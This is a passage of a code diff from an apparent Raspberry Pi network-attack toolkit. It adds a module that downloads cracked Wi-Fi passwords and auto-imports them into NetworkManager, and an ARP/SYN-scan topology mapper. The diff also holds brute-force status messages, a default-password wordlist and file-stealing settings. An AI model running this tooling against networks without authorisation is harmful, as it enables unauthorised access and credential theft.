extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
except Exception:
pass
return d
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
class WPAsecPotfileManager:
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
def __init__(self, shared_data):
"""
Orchestrator always passes shared_data.
Even if unused here, we store it for compatibility.
"""
self.shared_data = shared_data
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
# --- Orchestrator entry point ---
def execute(self, ip=None, port=None, row=None, status_key=None):
"""
Entry point for orchestrator.
By default: download latest potfile if API key is available.
"""
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
self.shared_data.comment_params = {"ip": ip, "port": port}
api_key = self.load_api_key()
if api_key:
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
return "success"
else:
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
return "failed"
# --- API Key Handling ---
def save_api_key(self, api_key: str):
"""Save the API key locally."""
try:
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {"api_key": api_key}
with open(self.SETTINGS_FILE, "w") as file:
json.dump(settings, file)
logging.info(f"API key saved to {self.SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save API key: {e}")
def load_api_key(self):
"""Load the API key from local storage."""
if os.path.exists(self.SETTINGS_FILE):
try:
with open(self.SETTINGS_FILE, "r") as file:
settings = json.load(file)
return settings.get("api_key")
except Exception as e:
logging.error(f"Failed to load API key: {e}")
return None
# --- Actions ---
def download_potfile(self, save_dir, api_key):
"""Download the potfile from WPAsec."""
try:
cookies = {"key": api_key}
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:
for chunk in response.iter_content(chunk_size=8192):
file.write(chunk)
logging.info(f"Potfile saved to: {filename}")
except requests.exceptions.RequestException as e:
logging.error(f"Failed to download potfile: {e}")
except Exception as e:
logging.error(f"Unexpected error: {e}")
def clean_directory(self, directory):
"""Delete all potfiles in the given directory."""
try:
if os.path.exists(directory):
logging.info(f"Cleaning directory: {directory}")
for file in os.listdir(directory):
file_path = os.path.join(directory, file)
if os.path.isfile(file_path):
os.remove(file_path)
logging.info(f"Deleted: {file_path}")
else:
logging.info(f"Directory does not exist: {directory}")
except Exception as e:
logging.error(f"Failed to clean directory {directory}: {e}")
def import_potfiles(self, directory):
"""Import potfiles into NetworkManager using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_added = []
DEFAULT_PRIORITY = 5
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, password = self._parse_potfile_line(line)
if not ssid or not password or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "add", "type", "wifi",
"con-name", ssid, "ifname", "*", "ssid", ssid,
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
"connection.autoconnect", "yes",
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_added.append(ssid)
logging.info(f"Imported network {ssid}")
except subprocess.CalledProcessError as e:
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
logging.info(f"Total imported: {networks_added}")
except Exception as e:
logging.error(f"Unexpected error while importing: {e}")
def erase_networks(self, directory):
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
try:
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
processed_ssids = set()
networks_removed = []
for path in potfile_paths:
with open(path, "r") as potfile:
for line in potfile:
line = line.strip()
if ":" not in line:
continue
ssid, _ = self._parse_potfile_line(line)
if not ssid or ssid in processed_ssids:
continue
try:
subprocess.run(
["sudo", "nmcli", "connection", "delete", "id", ssid],
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
)
processed_ssids.add(ssid)
networks_removed.append(ssid)
logging.info(f"Deleted network {ssid}")
except subprocess.CalledProcessError as e:
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
logging.info(f"Total deleted: {networks_removed}")
except Exception as e:
logging.error(f"Unexpected error while erasing: {e}")
# --- Helpers ---
def _parse_potfile_line(self, line: str):
"""Parse a potfile line into (ssid, password)."""
ssid, password = None, None
if line.startswith("$WPAPSK$") and "#" in line:
try:
ssid_hash, password = line.split(":", 1)
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
except ValueError:
return None, None
elif len(line.split(":")) == 4:
try:
_, _, ssid, password = line.split(":")
except ValueError:
return None, None
return ssid, password
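# Illustrative potfile lines handled above (the first one comes from the sample potfile
# shipped in this repository):
#   "42f5203400a6:b65b4c0befdf:pwned:deauther"  -> ssid="pwned", password="deauther"
#   "$WPAPSK$MyNet#<hashdata>:secretpass"       -> ssid="MyNet", password="secretpass"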
# --- CLI ---
def run(self, argv=None):
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
args = parser.parse_args(argv)
api_key = args.key
if api_key:
self.save_api_key(api_key)
else:
api_key = self.load_api_key()
if args.clean:
self.clean_directory(args.directory)
if args.import_potfiles:
self.import_potfiles(args.directory)
if args.erase:
self.erase_networks(args.directory)
if api_key and not args.clean and not args.import_potfiles and not args.erase:
self.download_potfile(args.directory, api_key)
if __name__ == "__main__":
WPAsecPotfileManager(shared_data=None).run()

335
actions/yggdrasil_mapper.py Normal file
View File

@@ -0,0 +1,335 @@
# Network topology mapping tool for discovering and visualizing network segments.
# Saves settings in `/home/bjorn/.settings_bjorn/yggdrasil_mapper_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -r, --range Network range to scan (CIDR format).
# -i, --interface Network interface to use (default: active interface).
# -d, --depth Maximum trace depth for routing (default: 5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/topology).
# -t, --timeout Timeout for probes in seconds (default: 2).
import os
import json
import argparse
from datetime import datetime
import logging
import subprocess
import networkx as nx
import matplotlib.pyplot as plt
import nmap
import scapy.all as scapy
from scapy.layers.inet import IP, ICMP, TCP
import threading
import queue
b_class = "YggdrasilMapper"
b_module = "yggdrasil_mapper"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/topology"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "yggdrasil_mapper_settings.json")
class YggdrasilMapper:
def __init__(self, network_range, interface=None, max_depth=5, output_dir=DEFAULT_OUTPUT_DIR, timeout=2):
self.network_range = network_range
self.interface = interface or scapy.conf.iface
self.max_depth = max_depth
self.output_dir = output_dir
self.timeout = timeout
self.graph = nx.Graph()
self.hosts = {}
self.routes = {}
self.lock = threading.Lock()
# For parallel processing
self.queue = queue.Queue()
self.results = queue.Queue()
def discover_hosts(self):
"""Discover live hosts in the network range."""
try:
logging.info(f"Discovering hosts in {self.network_range}")
# ARP scan for local network
arp_request = scapy.ARP(pdst=self.network_range)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
packets = broadcast/arp_request
answered, _ = scapy.srp(packets, timeout=self.timeout, iface=self.interface, verbose=False)
for sent, received in answered:
ip = received.psrc
mac = received.hwsrc
self.hosts[ip] = {'mac': mac, 'status': 'up'}
logging.info(f"Discovered host: {ip} ({mac})")
# Additional Nmap scan for service discovery
nm = nmap.PortScanner()
nm.scan(hosts=self.network_range, arguments='-sn -T4')
for host in nm.all_hosts():
if host not in self.hosts:
self.hosts[host] = {'status': 'up'}
logging.info(f"Discovered host: {host}")
except Exception as e:
logging.error(f"Error discovering hosts: {e}")
def trace_route(self, target):
"""Perform traceroute to a target."""
try:
hops = []
for ttl in range(1, self.max_depth + 1):
pkt = IP(dst=target, ttl=ttl)/ICMP()
reply = scapy.sr1(pkt, timeout=self.timeout, verbose=False)
if reply is None:
continue
if reply.src == target:
hops.append(reply.src)
break
hops.append(reply.src)
return hops
except Exception as e:
logging.error(f"Error tracing route to {target}: {e}")
return []
def scan_ports(self, ip):
"""Scan common ports on a host."""
try:
common_ports = [21, 22, 23, 25, 53, 80, 443, 445, 3389]
open_ports = []
for port in common_ports:
tcp_connect = IP(dst=ip)/TCP(dport=port, flags="S")
response = scapy.sr1(tcp_connect, timeout=self.timeout, verbose=False)
if response and response.haslayer(TCP):
if response[TCP].flags == 0x12: # SYN-ACK
open_ports.append(port)
# Send RST to close connection
rst = IP(dst=ip)/TCP(dport=port, flags="R")
scapy.send(rst, verbose=False)
return open_ports
except Exception as e:
logging.error(f"Error scanning ports for {ip}: {e}")
return []
def worker(self):
"""Worker function for parallel processing."""
while True:
try:
task = self.queue.get()
if task is None:
break
ip = task
hops = self.trace_route(ip)
ports = self.scan_ports(ip)
self.results.put({
'ip': ip,
'hops': hops,
'ports': ports
})
self.queue.task_done()
except Exception as e:
logging.error(f"Worker error: {e}")
self.queue.task_done()
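# The worker threads above take IPs placed on self.queue by build_topology() below,
# push per-host results onto self.results, and exit once they read a None sentinel.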
def build_topology(self):
"""Build network topology by tracing routes and scanning hosts."""
try:
# Start worker threads
workers = []
for _ in range(5): # Number of parallel workers
t = threading.Thread(target=self.worker)
t.start()
workers.append(t)
# Add tasks to queue
for ip in self.hosts.keys():
self.queue.put(ip)
# Add None to queue to stop workers
for _ in workers:
self.queue.put(None)
# Wait for all workers to complete
for t in workers:
t.join()
# Process results
while not self.results.empty():
result = self.results.get()
ip = result['ip']
hops = result['hops']
ports = result['ports']
self.hosts[ip]['ports'] = ports
if len(hops) > 1:
self.routes[ip] = hops
# Add nodes and edges to graph
self.graph.add_node(ip, **self.hosts[ip])
for i in range(len(hops) - 1):
self.graph.add_edge(hops[i], hops[i + 1])
except Exception as e:
logging.error(f"Error building topology: {e}")
def generate_visualization(self):
"""Generate network topology visualization."""
try:
plt.figure(figsize=(12, 8))
# Position nodes using spring layout
pos = nx.spring_layout(self.graph)
# Draw nodes
nx.draw_networkx_nodes(self.graph, pos, node_size=500)
# Draw edges
nx.draw_networkx_edges(self.graph, pos)
# Add labels
labels = {}
for node in self.graph.nodes():
label = f"{node}\n"
if node in self.hosts and 'ports' in self.hosts[node]:  # intermediate hops are graph nodes but not in self.hosts
label += f"Ports: {', '.join(map(str, self.hosts[node]['ports']))}"
labels[node] = label
nx.draw_networkx_labels(self.graph, pos, labels, font_size=8)
# Save visualization
os.makedirs(self.output_dir, exist_ok=True)  # the output directory may not exist yet at this point
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
viz_path = os.path.join(self.output_dir, f"topology_{timestamp}.png")
plt.savefig(viz_path)
plt.close()
logging.info(f"Visualization saved to {viz_path}")
except Exception as e:
logging.error(f"Error generating visualization: {e}")
def save_results(self):
"""Save topology data to JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'network_range': self.network_range,
'hosts': self.hosts,
'routes': self.routes,
'topology': {
'nodes': list(self.graph.nodes()),
'edges': list(self.graph.edges())
}
}
output_file = os.path.join(self.output_dir, f"topology_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the network mapping process."""
try:
logging.info(f"Starting network mapping of {self.network_range}")
# Discovery phase
self.discover_hosts()
if not self.hosts:
logging.error("No hosts discovered")
return
# Topology building phase
self.build_topology()
# Generate outputs
self.generate_visualization()
self.save_results()
logging.info("Network mapping completed")
except Exception as e:
logging.error(f"Error during execution: {e}")
def save_settings(network_range, interface, max_depth, output_dir, timeout):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"network_range": network_range,
"interface": interface,
"max_depth": max_depth,
"output_dir": output_dir,
"timeout": timeout
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Network topology mapping tool")
parser.add_argument("-r", "--range", help="Network range to scan (CIDR)")
parser.add_argument("-i", "--interface", help="Network interface to use")
parser.add_argument("-d", "--depth", type=int, default=5, help="Maximum trace depth")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=2, help="Timeout for probes")
args = parser.parse_args()
settings = load_settings()
network_range = args.range or settings.get("network_range")
interface = args.interface or settings.get("interface")
max_depth = args.depth or settings.get("max_depth")
output_dir = args.output or settings.get("output_dir")
timeout = args.timeout or settings.get("timeout")
if not network_range:
logging.error("Network range is required. Use -r or save it in settings")
return
save_settings(network_range, interface, max_depth, output_dir, timeout)
mapper = YggdrasilMapper(
network_range=network_range,
interface=interface,
max_depth=max_depth,
output_dir=output_dir,
timeout=timeout
)
mapper.execute()
if __name__ == "__main__":
main()

1331
c2_manager.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -1,71 +1,342 @@
# comment.py
# This module defines the `Commentaireia` class, which provides context-based random comments.
# The comments are based on various themes such as "IDLE", "SCANNER", and others, to simulate
# different states or actions within a network scanning and security context. The class uses a
# shared data object to determine delays between comments and switches themes based on the current
# state. The `get_commentaire` method returns a random comment from the specified theme, ensuring
# comments are not repeated too frequently.
# Comments manager with database backend
# Provides contextual messages for display with timing control and multilingual support.
# comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
# With a DB text along the lines of: "Trying {user}@{ip} over SSH..."
import random
import os
import time
import logging
import json
import random
import locale
from typing import Optional, List, Dict, Any
from init_shared import shared_data
from logger import Logger
import os
logger = Logger(name="comment.py", level=logging.DEBUG)
logger = Logger(name="comment.py", level=20) # INFO
# --- Helpers -----------------------------------------------------------------
class _SafeDict(dict):
"""Safe formatter: leaves unknown {placeholders} intact instead of raising."""
def __missing__(self, key):
return "{" + key + "}"
def _row_get(row: Any, key: str, default=None):
"""Safe accessor for rows that may be dict-like or sqlite3.Row."""
try:
return row.get(key, default)
except Exception:
try:
return row[key]
except Exception:
return default
# --- Main class --------------------------------------------------------------
class CommentAI:
"""
AI-style comment generator for status messages with:
- Randomized delay between messages
- Database-backed phrases (text, status, theme, lang, weight)
- Multilingual search with language priority and fallbacks
- Safe string templates: "Trying {user}@{ip}..."
"""
class Commentaireia:
"""Provides context-based random comments for bjorn."""
def __init__(self):
self.shared_data = shared_data
self.last_comment_time = 0 # Initialize last_comment_time
self.comment_delay = random.randint(self.shared_data.comment_delaymin, self.shared_data.comment_delaymax) # Initialize comment_delay
self.last_theme = None # Initialize last_theme
self.themes = self.load_comments(self.shared_data.commentsfile) # Load themes from JSON file
def load_comments(self, commentsfile):
"""Load comments from a JSON file."""
cache_file = commentsfile + '.cache'
# Timing configuration with robust defaults
self.delay_min = max(1, int(getattr(self.shared_data, "comment_delaymin", 5)))
self.delay_max = max(self.delay_min, int(getattr(self.shared_data, "comment_delaymax", 15)))
self.comment_delay = self._new_delay()
# Check if a cached version exists and is newer than the original file
if os.path.exists(cache_file) and os.path.getmtime(cache_file) >= os.path.getmtime(commentsfile):
try:
with open(cache_file, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from cache.")
return comments_data
except (FileNotFoundError, json.JSONDecodeError):
logger.warning("Cache file is corrupted or not found. Loading from the original file.")
# State tracking
self.last_comment_time: float = 0.0
self.last_status: Optional[str] = None
# Load from the original file if cache is not used or corrupted
try:
with open(commentsfile, 'r') as file:
comments_data = json.load(file)
logger.info("Comments loaded successfully from JSON file.")
# Save to cache
with open(cache_file, 'w') as cache:
json.dump(comments_data, cache)
return comments_data
except FileNotFoundError:
logger.error(f"The file '{commentsfile}' was not found.")
return {"IDLE": ["Default comment, no comments file found."]} # Fallback to a default theme
except json.JSONDecodeError:
logger.error(f"The file '{commentsfile}' is not a valid JSON file.")
return {"IDLE": ["Default comment, invalid JSON format."]} # Fallback to a default theme
# Ensure comments are loaded in database
self._ensure_comments_loaded()
def get_commentaire(self, theme):
""" This method returns a random comment based on the specified theme."""
current_time = time.time() # Get the current time in seconds
if theme != self.last_theme or current_time - self.last_comment_time >= self.comment_delay: # Check if the theme has changed or if the delay has expired
self.last_comment_time = current_time # Update the last comment time
self.last_theme = theme # Update the last theme
# Initialize first comment for UI using language priority
if not hasattr(self.shared_data, "bjorn_says") or not getattr(self.shared_data, "bjorn_says"):
first = self._pick_text("IDLE", lang=None, params=None)
self.shared_data.bjorn_says = first or "Initializing..."
if theme not in self.themes:
logger.warning(f"The theme '{theme}' is not defined, using the default theme IDLE.")
theme = "IDLE"
# --- Language priority & JSON discovery ----------------------------------
return random.choice(self.themes[theme]) # Return a random comment based on the specified theme
else:
def _lang_priority(self, preferred: Optional[str] = None) -> List[str]:
"""
Build ordered language preference list, deduplicated.
Priority sources:
1. explicit `preferred`
2. shared_data.lang_priority (list)
3. shared_data.lang (single fallback)
4. defaults ["en", "fr"]
"""
order: List[str] = []
def norm(x: Optional[str]) -> Optional[str]:
if not x:
return None
x = str(x).strip().lower()
return x[:2] if x else None
# 1) explicit override
p = norm(preferred)
if p:
order.append(p)
sd = self.shared_data
# 2) list from shared_data
if hasattr(sd, "lang_priority") and isinstance(sd.lang_priority, (list, tuple)):
order += [l for l in (norm(x) for x in sd.lang_priority) if l]
# 3) single language from shared_data
if hasattr(sd, "lang"):
l = norm(sd.lang)
if l:
order.append(l)
# 4) fallback defaults
order += ["en", "fr"]
# Deduplicate while preserving order
seen, res = set(), []
for l in order:
if l and l not in seen:
seen.add(l)
res.append(l)
return res
def _get_comments_json_paths(self, lang: Optional[str] = None) -> List[str]:
"""
Return candidate JSON paths, restricted to default_comments_dir (and explicit comments_file).
Supported patterns:
- {comments_file} (explicit)
- {default_comments_dir}/comments.json
- {default_comments_dir}/comments.<lang>.json
- {default_comments_dir}/{lang}/comments.json
"""
lang = (lang or "").strip().lower()
candidates = []
# 1) Explicit path from shared_data
comments_file = getattr(self.shared_data, "comments_file", "") or ""
if comments_file:
candidates.append(comments_file)
# 2) Default comments directory
default_dir = getattr(self.shared_data, "default_comments_dir", "")
if default_dir:
candidates += [
os.path.join(default_dir, "comments.json"),
os.path.join(default_dir, f"comments.{lang}.json") if lang else "",
os.path.join(default_dir, lang, "comments.json") if lang else "",
]
# Deduplicate
unique_paths, seen = [], set()
for p in candidates:
p = (p or "").strip()
if p and p not in seen:
seen.add(p)
unique_paths.append(p)
return unique_paths
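# Illustrative (with a hypothetical default_comments_dir of "/home/bjorn/Bjorn/comments"
# and lang "fr"), the directory-based candidates would be, in order:
#   /home/bjorn/Bjorn/comments/comments.json
#   /home/bjorn/Bjorn/comments/comments.fr.json
#   /home/bjorn/Bjorn/comments/fr/comments.json
# with any explicit shared_data.comments_file placed before them.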
# --- Bootstrapping DB -----------------------------------------------------
def _ensure_comments_loaded(self):
"""Ensure comments are present in DB; import JSON if empty."""
try:
comment_count = int(self.shared_data.db.count_comments())
except Exception as e:
logger.error(f"Database error counting comments: {e}")
comment_count = 0
if comment_count > 0:
logger.debug(f"Comments already in database: {comment_count}")
return
imported = 0
for lang in self._lang_priority():
for json_path in self._get_comments_json_paths(lang):
if os.path.exists(json_path):
try:
count = int(self.shared_data.db.import_comments_from_json(json_path))
imported += count
if count > 0:
logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
break # stop at first successful import
except Exception as e:
logger.error(f"Failed to import comments from {json_path}: {e}")
if imported > 0:
break
if imported == 0:
logger.debug("No comments imported, seeding minimal fallback set")
self._seed_minimal_comments()
def _seed_minimal_comments(self):
"""
Seed minimal set when no JSON available.
Schema per row: (text, status, theme, lang, weight)
"""
default_comments = [
# English
("Scanning network for targets...", "NetworkScanner", "NetworkScanner", "en", 2),
("System idle, awaiting commands.", "IDLE", "IDLE", "en", 3),
("Analyzing network topology...", "NetworkScanner", "NetworkScanner", "en", 1),
("Processing authentication attempts...", "SSHBruteforce", "SSHBruteforce", "en", 2),
("Searching for vulnerabilities...", "NmapVulnScanner", "NmapVulnScanner", "en", 2),
("Extracting credentials from services...", "CredExtractor", "CredExtractor", "en", 1),
("Monitoring network changes...", "IDLE", "IDLE", "en", 2),
("Ready for deployment.", "IDLE", "IDLE", "en", 1),
("Target acquisition in progress...", "NetworkScanner", "NetworkScanner", "en", 1),
("Establishing secure connections...", "SSHBruteforce", "SSHBruteforce", "en", 1),
# French (minimal bonus set)
("Analyse du réseau en cours...", "NetworkScanner", "NetworkScanner", "fr", 2),
("Système au repos, en attente d'ordres.", "IDLE", "IDLE", "fr", 3),
("Cartographie de la topologie réseau...", "NetworkScanner", "NetworkScanner", "fr", 1),
("Tentatives d'authentification en cours...", "SSHBruteforce", "SSHBruteforce", "fr", 2),
("Recherche de vulnérabilités...", "NmapVulnScanner", "NmapVulnScanner", "fr", 2),
("Extraction d'identifiants depuis les services...", "CredExtractor", "CredExtractor", "fr", 1),
]
try:
self.shared_data.db.insert_comments(default_comments)
logger.info(f"Seeded {len(default_comments)} minimal comments into database")
except Exception as e:
logger.error(f"Failed to seed minimal comments: {e}")
# --- Core selection -------------------------------------------------------
def _new_delay(self) -> int:
"""Generate new random delay between comments."""
delay = random.randint(self.delay_min, self.delay_max)
logger.debug(f"Next comment delay: {delay}s")
return delay
def _pick_text(
self,
status: str,
lang: Optional[str],
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Pick a weighted comment across language preference; supports {templates}.
Selection cascade (per language in priority order):
1) (lang, status)
2) (lang, 'ANY')
3) (lang, 'IDLE')
Then cross-language:
4) (any, status)
5) (any, 'IDLE')
"""
status = status or "IDLE"
langs = self._lang_priority(preferred=lang)
# Language-scoped queries
rows = []
queries = [
("SELECT text, weight FROM comments WHERE lang=? AND status=?", lambda L: (L, status)),
("SELECT text, weight FROM comments WHERE lang=? AND status='ANY'", lambda L: (L,)),
("SELECT text, weight FROM comments WHERE lang=? AND status='IDLE'", lambda L: (L,)),
]
for L in langs:
for sql, args_fn in queries:
try:
rows = self.shared_data.db.query(sql, args_fn(L))
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if rows:
break
# Cross-language fallbacks
if not rows:
for sql, args in [
("SELECT text, weight FROM comments WHERE status=? ORDER BY RANDOM() LIMIT 50", (status,)),
("SELECT text, weight FROM comments WHERE status='IDLE' ORDER BY RANDOM() LIMIT 50", ()),
]:
try:
rows = self.shared_data.db.query(sql, args)
except Exception as e:
logger.error(f"DB query failed: {e}")
rows = []
if rows:
break
if not rows:
return None
# Weighted selection pool
pool: List[str] = []
for row in rows:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
w = max(1, w)
text = _row_get(row, "text", "")
if text:
pool.extend([text] * w)
chosen = random.choice(pool) if pool else _row_get(rows[0], "text", None)
# Templates {var}
if chosen and params:
try:
chosen = str(chosen).format_map(_SafeDict(params))
except Exception:
# Keep the raw text if formatting fails
pass
return chosen
# --- Public API -----------------------------------------------------------
def get_comment(
self,
status: str,
lang: Optional[str] = None,
params: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Return a comment if status changed or delay expired.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
params: optional dict to format templates with {placeholders}.
Returns:
str or None: A new comment, or None if not time yet and status unchanged.
"""
current_time = time.time()
status = status or "IDLE"
status_changed = (status != self.last_status)
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
text = self._pick_text(status, lang, params)
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
return text
return None
# Backward compatibility alias
Commentaireia = CommentAI

View File

View File

@@ -1,107 +0,0 @@
{
"__title_Bjorn__": "Settings",
"manual_mode": false,
"websrv": true,
"web_increment ": false,
"debug_mode": true,
"scan_vuln_running": false,
"retry_success_actions": false,
"retry_failed_actions": true,
"blacklistcheck": true,
"displaying_csv": true,
"log_debug": true,
"log_info": true,
"log_warning": true,
"log_error": true,
"log_critical": true,
"startup_delay": 10,
"web_delay": 2,
"screen_delay": 1,
"comment_delaymin": 15,
"comment_delaymax": 30,
"livestatus_delay": 8,
"image_display_delaymin": 2,
"image_display_delaymax": 8,
"scan_interval": 180,
"scan_vuln_interval": 900,
"failed_retry_delay": 600,
"success_retry_delay": 900,
"ref_width": 122,
"ref_height": 250,
"epd_type": "epd2in13_V4",
"__title_lists__": "List Settings",
"portlist": [
20,
21,
22,
23,
25,
53,
69,
80,
110,
111,
135,
137,
139,
143,
161,
162,
389,
443,
445,
512,
513,
514,
587,
636,
993,
995,
1080,
1433,
1521,
2049,
3306,
3389,
5000,
5001,
5432,
5900,
8080,
8443,
9090,
10000
],
"mac_scan_blacklist": [
"00:11:32:c4:71:9b",
"00:11:32:c4:71:9a"
],
"ip_scan_blacklist": [
"192.168.1.1",
"192.168.1.12",
"192.168.1.38",
"192.168.1.53",
"192.168.1.40",
"192.168.1.29"
],
"steal_file_names": [
"ssh.csv",
"hack.txt"
],
"steal_file_extensions": [
".bjorn",
".hack",
".flag"
],
"__title_network__": "Network",
"nmap_scan_aggressivity": "-T2",
"portstart": 1,
"portend": 2,
"__title_timewaits__": "Time Wait Settings",
"timewait_smb": 0,
"timewait_ssh": 0,
"timewait_telnet": 0,
"timewait_ftp": 0,
"timewait_sql": 0,
"timewait_rdp": 0
}

View File

@@ -1,3 +1,7 @@
root
admin
bjorn
password
toor
1234
123456

View File

@@ -0,0 +1 @@
42f5203400a6:b65b4c0befdf:pwned:deauther

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

View File

531
database.py Normal file
View File

@@ -0,0 +1,531 @@
# database.py
# Main database facade - delegates to specialized modules in db_utils/
# Maintains backward compatibility with existing code
import os
from typing import Any, Dict, Iterable, List, Optional, Tuple
from contextlib import contextmanager
from threading import RLock
import sqlite3
import logging
from logger import Logger
from db_utils.base import DatabaseBase
from db_utils.config import ConfigOps
from db_utils.hosts import HostOps
from db_utils.actions import ActionOps
from db_utils.queue import QueueOps
from db_utils.vulnerabilities import VulnerabilityOps
from db_utils.software import SoftwareOps
from db_utils.credentials import CredentialOps
from db_utils.services import ServiceOps
from db_utils.scripts import ScriptOps
from db_utils.stats import StatsOps
from db_utils.backups import BackupOps
from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
logger = Logger(name="database.py", level=logging.DEBUG)
_DEFAULT_DB = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data", "bjorn.db")
class BjornDatabase:
"""
Main database facade that delegates operations to specialized modules.
All existing method calls remain unchanged - they're automatically forwarded.
"""
def __init__(self, db_path: Optional[str] = None):
self.db_path = db_path or _DEFAULT_DB
os.makedirs(os.path.dirname(self.db_path), exist_ok=True)
# Initialize base connection manager
self._base = DatabaseBase(self.db_path)
# Initialize all operational modules (they share the base connection)
self._config = ConfigOps(self._base)
self._hosts = HostOps(self._base)
self._actions = ActionOps(self._base)
self._queue = QueueOps(self._base)
self._vulnerabilities = VulnerabilityOps(self._base)
self._software = SoftwareOps(self._base)
self._credentials = CredentialOps(self._base)
self._services = ServiceOps(self._base)
self._scripts = ScriptOps(self._base)
self._stats = StatsOps(self._base)
self._backups = BackupOps(self._base)
self._comments = CommentOps(self._base)
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
# Ensure schema is created
self.ensure_schema()
logger.info(f"BjornDatabase initialized: {self.db_path}")
# =========================================================================
# CORE PRIMITIVES - Delegated to base
# =========================================================================
@property
def _conn(self):
"""Access to underlying connection"""
return self._base._conn
@property
def _lock(self):
"""Access to thread lock"""
return self._base._lock
@property
def _cache_ttl(self):
return self._base._cache_ttl
@property
def _stats_cache(self):
return self._base._stats_cache
@_stats_cache.setter
def _stats_cache(self, value):
self._base._stats_cache = value
def _cursor(self):
return self._base._cursor()
def transaction(self, immediate: bool = True):
return self._base.transaction(immediate)
def execute(self, sql: str, params: Iterable[Any] = (), many: bool = False) -> int:
